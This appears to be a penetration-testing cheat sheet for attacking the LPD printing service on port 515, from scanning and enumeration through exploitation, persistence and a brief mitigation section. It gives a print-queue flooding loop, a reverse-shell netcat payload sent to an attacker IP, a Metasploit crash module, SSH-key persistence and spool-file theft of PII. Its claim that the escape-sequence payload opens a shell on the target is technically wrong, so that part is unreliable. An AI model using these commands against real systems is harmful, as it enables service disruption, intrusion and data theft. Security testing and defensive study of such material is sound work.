Line Printer Daemon (LPD) - Port 515

Basic Info

• Port Number: 515

• Service: Line Printer Daemon (LPD)

• Common Usage: LPD is a network printing protocol used to manage print jobs on UNIX and Linux systems. It allows remote computers to submit print jobs to a central print server.

• Default State: Open on many older UNIX/Linux distributions, but often disabled in modern systems.

• Security Concerns:

  • Lacks authentication, allowing unauthorized access if improperly configured.

  • Susceptible to command injection and buffer overflow attacks.

  • Can be used for denial-of-service (DoS) attacks by sending large or malformed print jobs.

  • Print job manipulation may allow sensitive document interception.

How to Connect

Manually Connecting to LPD

LPD listens on port 515 and operates by receiving print job commands. You can interact with it manually using netcat or telnet:

nc -v [Target-IP] 515

If the connection is successful, LPD is running and ready for further enumeration.

You can also check the /etc/printcap file (if accessible) to see available printers:

cat /etc/printcap

Reconnaissance (Recon)

Scanning for Port 515

Use Nmap to detect if the LPD service is running:

nmap -p 515 -sV -T4 [Target-IP]

Expected output:

515/tcp open  printer  Line Printer Daemon (LPD)

For a deeper scan using NSE scripts:

nmap --script=lpd-enum -p 515 [Target-IP]

This will attempt to enumerate available printers and configurations.

Enumeration

Checking Printer Queues

If LPD is running, you can list print queues using:

lpq -S [Target-IP]

If no authentication is required, this command may reveal active print jobs.

Enumerating Available Printers

Try checking the configuration of remote printers:

lpstat -v -h [Target-IP]

If a printer is misconfigured, it might allow arbitrary command execution.

Attack Vector

• Anonymous Printing Abuse – If LPD is open and does not require authentication, an attacker can send unlimited print jobs, leading to resource exhaustion (Denial of Service).

• Command Injection in Print Jobs – Certain LPD implementations allow escape sequences that can lead to remote code execution.

• Directory Traversal – Some older LPD implementations allow path traversal, enabling an attacker to overwrite files outside the spool directory.

• Print Job Interception – If an attacker gains access, they may be able to capture sensitive documents submitted for printing.

Exploitation

Exploiting Open Print Queue for DoS

Send a large number of print jobs to overwhelm the system:

for i in {1..1000}; do
  echo "Fake print job $i" | lpr -S [Target-IP] -P [Printer-Name]
done

This fills the print queue, preventing legitimate users from printing.

Command Injection via LPD Escape Sequences

Some LPD services allow malicious escape sequences that execute shell commands. Try submitting a print job with a malicious payload:

echo -e "\033[31m$(nc -e /bin/sh [Attacker-IP] 4444)\033[0m" | lpr -S [Target-IP] -P [Printer-Name]

If successful, this opens a reverse shell on the target system.

Metasploit Exploit for LPD

Metasploit has modules that can exploit LPD misconfigurations:

use auxiliary/dos/lpd/lpd_crash
set RHOSTS [Target-IP]
exploit

This attempts to crash the LPD service.

Tools Used

• Nmap – Scanning and service detection

• LPQ / LPSTAT – Printer queue enumeration

• Netcat (nc) – Manual interaction and exploitation

• Hydra – Brute-force login attempts (if authentication is enabled)

• Metasploit – LPD-specific exploits and auxiliary modules

• Burp Suite – If a web-based printer management interface is available

Post-Exploitation

Privilege Escalation

If you gain access through LPD, check for SUID binaries to escalate privileges:

find / -perm -4000 -type f 2>/dev/null

Maintaining Access

To maintain persistence, add an SSH key to the target machine:

echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys

Extracting Sensitive Print Jobs

If access is gained, look for spool files that contain document data:

ls -lah /var/spool/lpd/

Print jobs often contain PII (Personally Identifiable Information) or sensitive corporate data.

Mitigation & Defense

To secure against LPD exploitation: ✅ Disable LPD if not required:

systemctl stop lpd
systemctl disable lpd

✅ Restrict access using firewall rules:

iptables -A INPUT -p tcp --dport 515 -s [Trusted-IP] -j ACCEPT
iptables -A INPUT -p tcp --dport 515 -j DROP

✅ Enforce authentication for print jobs and disable guest access. ✅ Use modern alternatives like CUPS (Common Unix Printing System) with encrypted communication.